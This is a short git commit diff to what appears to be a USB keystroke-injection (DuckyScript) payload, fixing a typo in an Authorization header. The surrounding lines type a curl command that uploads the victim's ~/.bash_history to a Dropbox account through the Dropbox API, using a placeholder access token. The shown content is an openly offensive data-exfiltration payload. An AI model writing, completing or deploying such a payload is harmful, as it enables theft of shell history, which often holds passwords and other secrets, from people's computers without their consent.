pull/229/head
Zoe Ronen 2023-02-12 03:43:27 -05:00
parent e7cffd1cd8
commit b027af3ff6
1 changed files with 2 additions and 2 deletions

View File

@ -17,7 +17,7 @@ DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload STRING curl -X POST https://content.dropboxapi.com/2/files/upload
SPACE SPACE
REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token
STRING --header "Authorization: Bea[DROPBOX_ACCESS_TOKEN]" STRING --header "Authorization: Bearer [DROPBOX_ACCESS_TOKEN]"
SPACE SPACE
STRING --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}" STRING --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}"
SPACE SPACE